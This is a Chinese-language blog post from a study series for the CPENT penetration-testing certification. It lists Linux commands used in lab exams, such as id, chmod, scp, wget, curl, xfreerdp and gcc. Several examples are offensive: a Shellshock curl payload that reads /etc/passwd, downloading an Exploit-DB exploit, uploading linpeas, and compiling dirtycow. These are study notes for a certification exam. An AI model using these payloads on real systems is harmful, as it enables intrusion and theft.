iT邦幫忙

2023 iThome 鐵人賽

DAY 5
0

這邊列了一些,考試常會用到的指令。對於 Linux 指令不熟的我,蠻實用的。

  • id:用於顯示當前用戶的身份和所屬的群組。
    判斷有沒有成功拿到 root 權限的時候蠻常用的。
    image.png
    image.png

  • chmod:用於更改文件或目錄的許可權(權限)。它可以讓您指定誰可以讀取、寫入和執行文件,以及對文件的其他操作。
    將自己上傳的執行檔,給予執行的權限。
    chmod +x linenum.sh
    image.png

  • sudo:以 root 權限執行命令。它允許授予普通用戶臨時的系統管理權限,以執行需要特殊權限的操作。

  • scp:用於安全地從本地系統將文件複製到遠程系統或從遠程系統複製文件到本地系統。它使用SSH協議進行加密的文件傳輸。
    scp ./linpeas.sh jason@192.168.20.7:/home/jason/linpeas.sh

  • pkill:用於根據進程名稱或其他條件終止正在運行的進程。
    pkill ssh //踢掉ssh 服務

  • wget:用於從網絡上下載文件。它支持HTTP、HTTPS和FTP協議,可以用於自動化文件下載操作。
    蠻多漏洞的攻擊工具可以從 Exploit Database 網站找到。
    假設想下載這篇的程式碼https://www.exploit-db.com/exploits/37292 ,將網址中的 exploits 改成 download 就可以直接用 wget 下載下來,蠻方便的。
    wget https://www.exploit-db.com/download/37292

  • curl:用於從命令行發出HTTP請求,可以用於下載文件、測試網絡服務、發送數據等。
    若存在 Shellshock 的弱點,則可以 Injection 惡意程式到 HTTP 的標頭(head)中。
    curl -H 'User-Agent: () { :; }; echo  ; echo ; /bin/cat /etc/passwd' bash -s :'' http://172.16.30.5/cgi-bin/keygen
    image.png

  • xfreerdp:是用於在Linux中遠程連接到 Windows 系統的 RDP 客戶端。它允許用戶通過遠程桌面協議(RDP)訪問Windows計算機。
    sudo apt install freerdp2-x11 //安裝套件
    xfreerdp /size:90% /v:192.168.170.200 //遠端桌面到 192.168.170.200 這台電腦

  • rdesktop (kali 用)
    rdesktop 172.16.253.9 -g 90%
    遠端桌面,如果要順便掛載資料夾到遠端主機,可以用下面指令
    rdesktop -r disk:tmp/home/abbot 192.168.253.15 -g 90%

  • apt install:用於在Debian或Ubuntu系統上安裝軟件包。它是Advanced Package Tool(APT)的一部分,用於管理軟件包。

  • python3 -m:這是Python的一種用法,用於運行Python模塊。通常,python3 -m 後面跟著模塊名稱,用於執行該模塊的主程序。
    用來架設臨時網站很方便,可以讓靶機下載本機檔案用。
    sudo python3 -m http.server 80

  • md5sum:用於計算文件的MD5校驗和,通常用於驗證文件的完整性。
    將檔案內容作 md5 雜湊
    md5sum /opt/rootflag.txt

  • gcc:為 GNU 編譯器套件(GNU Compiler Collection)的一部分,用於編譯和生成可執行程序。它通常用於C和C++編程。
    常用來編譯從網路找來的駭客工具。
    gcc -pthread dirtycow.c -o dirty -lcrypt


上一篇
Hydra 九頭蛇 - 暴力破解工具
下一篇
Linux 常用指令 - 檔案操作篇
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言